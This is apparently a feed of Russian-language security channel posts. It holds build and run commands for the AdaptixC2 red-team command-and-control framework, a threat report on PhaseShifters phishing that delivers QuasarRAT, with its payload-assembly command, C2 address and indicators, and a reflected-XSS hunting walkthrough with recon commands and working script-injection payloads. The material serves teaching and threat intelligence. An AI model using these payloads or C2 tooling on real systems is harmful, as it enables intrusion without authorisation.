Fsecurity | HH

🔗Ссылка: https://www.securitylab.ru/analytics/551226.php

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/

🔗Ссылка: https://habr.com/ru/companies/bastion/articles/911852/

🔗Ссылка: https://opennet.ru/63332/

🦎 AdaptixC2 v0.5 Большой обзор (english) ⭐️Возможности:

Server/Client Architecture for Multiplayer Support Cross-platform GUI client Fully encrypted communications Listener and Agents as Plugin (Extender) Client extensibility for adding new tools Task and Jobs storage Files and Process browsers Socks4 / Socks5 / Socks5 Auth support Local and Reverse port forwarding support BOF support Linking Agents and Sessions Graph Agents Health Checker Agents KillDate and WorkingTime control Windows/Linux/MacOs agents support Remote Terminal

⚙️Установка/Запуск 💻:

sudo apt install golang-1.23 mingw-w64 make
sudo ln -s /usr/lib/go-1.23/bin/go /usr/local/bin/go

sudo apt install make cmake libssl-dev qt6-base-dev qt6-websockets-dev

git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh

./adaptixserver -profile profile.json
./AdaptixClient

💻 Rep 💻 Extension-Kit 📔 Docs ✈️ Channel ✈️ Group #adaptixc2 #redteam #soft ✈️ Whitehat Lab 💬Chat

🔗Ссылка: https://specterops.io/blog/2025/05/28/revisiting-com-hijacking/

Caster - Sara v1.2 Я подготовил небольшое обновление для Sara - утилиты для аудита безопасности маршрутизаторов MikroTik: - Добавлена поддержка аутентификации по SSH-ключу - Полностью переписан механизм поиска CVE: теперь используется база NVD, и точность определения уязвимостей стала выше Это обновление позволило сделать инструмент чуть лучше. https://github.com/casterbyte/Sara https://github.com/casterbyte/Sara/releases/tag/v1.2

🔗Ссылка: https://opennet.ru/63328/

Новая кампания PhaseShifters 👽 В течение мая группа киберразведки PT ESC фиксирует волну активности хакерской группировки PhaseShifters, о которой мы рассказывали в январе этого года. Группировка проводит фишинговую рассылку, выдавая себя за Министерство образования и науки Российской Федерации. Для организации рассылки был зарегистрирован домен minobnauki.ru, MX-запись которого указывает на IP-адрес 193.124.33.207. На этом же сервере был размещен домен mail.min-prom.ru, с которого ранее PhaseShifters рассылала фишинговые письма от имени Минпромторга. В теле фишинговых писем группировка прикладывает зашифрованный архив, внутри которого находится вредоносное ПО QuasarRAT, замаскированное под обычный документ DOCX. Внутри QuasarRAT содержит основное письмо, а рядом в архиве лежит отдельный документ-приманка, служащий приложением к основному файлу. Во время распаковки и запуска вредоноса выполняются проверки на наличие разных антивирусных решений по ключам bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn, в зависимости от чего немного меняются параметры запуска. Скрытая полезная нагрузка QuasarRAT доставляется в несколько фрагментов с расширением .adt, а затем собирается в единый исполняемый файл при помощи последовательного объединения командой

cmd /c copy /b ..\Quiet.adt + ..\Achievements.adt + ..\Yen.adt + … + ..\Panic.adt k

После успешного объединения фрагментов вредоносная программа закрепляется в системе через копирование ярлыка в папку автозагрузки пользователя, что обеспечивает его автоматический запуск при входе в систему. Для маскировки атакующий процесс создает экземпляр RegAsm.exe, в который внедряется QuasarRAT, после чего устанавливается защищенное соединение с командным сервером 5.8.11.119:4782, на котором размещен сертификат QuasarRAT. При этом Regasm расположен не по стандартному пути, а копируется в другую папку, откуда уже запускается для последующего инжектирования в него кода. Такие варианты запуска позволяют строить детекты или хантинг системных бинарей, запускаемых из нестандартных расположений. Данная C2-инфраструктура уже применялась этой группировкой в предыдущих операциях, однако в тех атаках в конфигурации серверов использовались домены thelightpower.info и crostech.ru. При анализе паттернов регистрации фишинговых доменов также выявлено, что злоумышленники предпочитают использовать IP-адреса из автономной системы AS41745 (Baykov Ilya Sergeevich). IoCs:

2b7004cb00d58967c7d6677495d3422e
0bbb3a2ac9ba7d14a784cbc2519fbd64
40ef2615afb15f61072d7cea9b1a856a
681af8a70203832f9b8de10a8d51860a

Prilozenie_k_pis_mu.docx
Pis_mo_zapros_na_predpriatia_OPK.doc.exe.exe
Исходящий от 26.05.2025.7z

193.124.33.207
minobnauki.ru
5.8.11.119
min-prom.ru
mail.min-prom.ru
superjoke.ru
forum-drom.ru
cloud-telegram.ru
about-sport.ru

#TI #APT #Phishing @ptescalator

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Всем привет! После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...Reflected XSS😂 В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про XSS, только контекст обычно зависит от грейда кандидата. Вообще XSS-кам, как классу уязвимостей предcказывали быструю смерть еще в 2014, когда Content Security Policy 2.0 стал фактически стандартом, но в классификации OWASP-10 от 2021 года XSS уверенно удерживает 3-е место на ряду с другими инъекциям, посмотрим как ситуация изменится в этом году. 💥Таким образом XSS: ✅ Распространенная уязвимость ✅ Дает серьезный импакт в определенных условиях ✅ Автоматизация поиска и эксплуатации ❓Как искать? ✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью: 🔧 Paramspider - использует web.archive.org для поиска url доменов из списка paramspider -l targets.txt 🔧 Gospider - довольно быстрый веб краулер на Go gospider -S targets.txt -a -w -r --js --sitemap --robots -d 2 -c 10 -t 20 -K 10 \ --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg|js|dat|pdf|webp|woff|woff2|tif|ttf|tiff2)" \ -q | tee gospider-out.txt ✅ Объединяем и сортируем выхлопы в один файлик: cd paramspider/output cat *.txt > paramspider_out.txt cat paramspider_out.txt | sort -u | tee tragets_url.txt ✅ Определяем живые хосты с помощью httpx httpx -l tragets_url.txt --threads 250 -o live_tragets_url.txt ✅ Сортируем выхлоп по расширениям: cat live_tragets_url.txt | grep -i -e '\.php$' | tee live_tragets_url_php.txt cat live_tragets_url.txt | grep -i -e '\.asp$' | tee live_tragets_url_asp.txt cat live_tragets_url.txt | grep -i -e '\.aspx$' | tee live_tragets_url_aspx.txt cat live_tragets_url.txt | grep -i -e '\.jsp$' | tee live_tragets_url_jsp.txt cat live_tragets_url.txt | grep -i -e '\.do$' | tee live_tragets_url_do.txt ✅ Ищем отраженные параметры с помощью: 🔧 Dalfox dalfox file live_tragets_url_jsp.txt --skip-xss-scanning -o live_tragets_url_jsp_reflecting.txt ✅ Определяем отраженный контекст: 🔖 Reflected Between HTML Tags <p>"><zxcvbro>Bro</p> 🔧 Используем полезную нагрузку: <img src=x onerror=prompt(1)> <details open ontoggle=prompt(origin)> <svg onload=confirm(1)> 🔐 Reflected Inside HTML Tag Attributes <input value="><zxcvbro>Bro"> 🔧 Используем полезную нагрузку: " autofocus onfocus=alert(document.domain) x=" "><script>alert(1)</script> 📜 Reflected Inside JavaScript <script> var input = '"><zxcvbro>Bro'; </script> 🔧 Используем полезную нагрузку: ';alert(1)// '-alert(1)-' </script><img src=1 onerror=alert(1)> ✅ Сдаем багу ✅ Вы великолепны💸

⚙️ BadSuccessor Очень подробный research #poc #windows #badsuccessor ✈️ Whitehat Lab 💬 Chat

🔗Ссылка: https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics

🔗Ссылка: https://habr.com/ru/articles/913764/

🔗Ссылка: https://habr.com/ru/companies/securityvison/articles/913832/

🔗Ссылка: https://habr.com/ru/companies/pt/articles/913386/

🔗Ссылка: https://securelist.ru/purerat-attacks-russian-organizations/112619/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/913546/